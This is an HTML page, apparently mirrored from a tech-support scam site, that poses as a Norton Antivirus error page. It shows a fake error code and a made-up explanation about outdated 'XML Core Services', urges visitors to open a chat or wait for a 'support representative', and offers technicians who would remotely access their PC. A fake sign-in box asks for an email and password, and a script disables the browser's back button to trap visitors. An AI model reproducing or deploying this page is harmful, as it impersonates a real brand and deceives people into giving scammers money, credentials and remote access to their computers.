<!DOCTYPE html>
<html lang="en">
  

<!-- Mirrored from norton.make2recipe.online/error.php by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 07 Jul 2022 02:47:44 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from nagsha4.dreamhosters.com/norton/nortonerror.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 11 Oct 2025 21:30:22 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="favicon.html" type="image/x-icon">

    <title>Norton Antivirus</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.css" rel="stylesheet">
	<link href="css/main.css" rel="stylesheet">
	<link href="css/font-awesome.css" rel="stylesheet">
	<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700,800' rel='stylesheet' type='text/css'>
  <script>window.$zoho=window.$zoho || {};$zoho.salesiq=$zoho.salesiq||{ready:function(){}}</script><script id="zsiqscript" src="https://salesiq.zohopublic.in/widget?wc=siq0ae988b55c356e026bbde90190e203a82824816083f939dd99bacfd1b8da197d" defer></script>

  </head>

  <body>
  
	  <div class="modal fade bs-example-modal-sm" tabindex="-1" role="dialog" aria-labelledby="mySmallModalLabel">
		<div class="modal-dialog modal-sm"> 
			<div class="modal-content"> 
				<div class="modal-header"> 
					<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true"><i class="fa fa-times"></i></span></button> 
						<h4 class="modal-title" id="mySmallModalLabel">Login with your Account</h4> 
				</div> 
				<div class="modal-body">
					<div class="login">
						<form>
							<div class="form-group">
								<input type="text" class="form-control" placeholder="Email / User Id">
							</div>
							<div class="form-group">
								<input type="Password" class="form-control" placeholder="Password">
							</div>
						</form>
						
					<div class="modal-form">
						<button type="button" class="btn btn-primary">Login</button>
						<a href="#">Forgot your Password ?</a>
						
					</div>
					</div>
				</div> 
				
				<div class="modal-footer ">
				<div class="modal-form">
					<button type="button" class="pull-left btn btn-primary">Register</button>
					<a href="#">Don't have an account ?</a>
				</div>
			  </div>
			</div> 
		</div>
	  </div>
  
  
	  <div class="navbar-wrapper">
      <div class="container">
        <nav class="navbar-inverse navbar-static-top">
          <div class="container">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
              </button>
              <div class="navbar-brand"><a  href="index.html"><img src="images/nortonlogo1.jpg"></a></div>
            </div>
            <div id="navbar" class="navbar-collapse collapse">
              <ul class="nav navbar-nav navbar-right">
                 <li><a href="#">Products &amp; Services</a></li>
				<li><a href="#">Resources</a></li>
                <li><a href="#">Support</a></li>
                <li><a href="#">My Norton</a></li>
				<div class="signin">
					<a href="#" data-toggle="modal" data-target=".bs-example-modal-sm">Sign in</a>
				  </div>
			  </ul>
			  
            </div>
          </div>
        </nav>

      </div>
    </div>

	
	<div class="error-page">
       	<div class="container">
				<div class="row">
					<div class="col-lg-8 col-lg-offset-2 col-md-8 col-md-offset-2 col-sm-12">
						<div class="second-title">
						

							<p style="text-align:center"><font size="17" color="white"><h7><b><br>An Error Has Occured: kb19867605223793EN</b> </h7> </font></p>
							<p style="text-align:center; margin-top: 50px; margin-bottom: 50px;"><font color="black"><h8><b>Your key has been redeemed successfully but the setup could not be started.
								</b><br>
								<font color="white">
								The error occurs because of out-of-date OS components related to XML Core Services (XML). XML is a set of services that allow applications written in JScript, VBScript, or Norton development tools to build Windows-native XML-based applications.
							</font ></h8>
							
							<p style="text-align:center; margin-top: 50px; margin-bottom: 50px;"><font color="black"><h4><b>You will get a call from our support representative shortly. If you cannot wait we recommend you to contact chat support now to fix this Error.
								</b><br>
								
					
																					</b><br>
							</font></h2><font color="black"><font color="black"></font><p><font color="black">
							 
							</font></p></font><p><font color="black">

							  
							     </font></p></div>
							       	  </div>
							      </div> 	
							      </div> 	 
		</div>


<div class="main-section-white">
     	<div class="container">
     	    <div class="row">
     	    	<div class="col-lg-8 col-lg-offset-2 col-md-8 col-md-offset-2 col-sm-12">
     	    		
     	    	</div>
     	    	<div class="row">
     	    		<div class="col-md-4">
     	    			<div class="host-item">
     	    					 <font color="#f0ac0e"> <b><h2>Norton Virtual Technician</h2></b></font>
								 <font color="#f0ac0e"><h5> 

It can diagnose and fix many problems related to your Norton product. For problems it can't fix, it collects information to make Search and Chat more effective.</h5></font>


     	    				   	</div>
     	    		</div>
     	    		<div class="col-md-4">
     	    			<div class="host-item">
     	    				 <font color="#f0ac0e"> <b><h2>Norton FAQs and Search</h2></b></font>
								 <font color="#f0ac0e"><h5> 



If Norton support Technician can't fix your problem or if you re accessing this site from a different computer, use our FAQs and powerful search tool to help you find answers.</h5></font>
	</div>
     	    		</div>
     	    		<div class="col-md-4">
     	    			<div class="host-item">
     	    				 <font color="#f0ac0e"> <b><h2>Contact Technical Support
</h2></b></font>
								 <font color="#f0ac0e"><h5> 




Still experiencing trouble? Contact one of our technicians who, with your permission, may access your PC to resolve your issue, while you watch!</h5></font>
	</div>
     	    		</div>
     	    	</div>
     	     </div>
		</div>
	</div>
	
	<section class="footer-bottom">
		Copyright 2018 	</section>   
	
    <!-- JavaScript -->
    <script src="../ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.html"></script>
    <script src="js/bootstrap.min.js"></script>
    <script>
	
history.pushState(null, null, location.href);
    window.onpopstate = function () {
        history.go(1);
    };
</script>

  </body>

<!-- Mirrored from norton.make2recipe.online/error.php by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 07 Jul 2022 02:47:50 GMT -->

<!-- Mirrored from nagsha4.dreamhosters.com/norton/nortonerror.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 11 Oct 2025 21:30:25 GMT -->
</html>


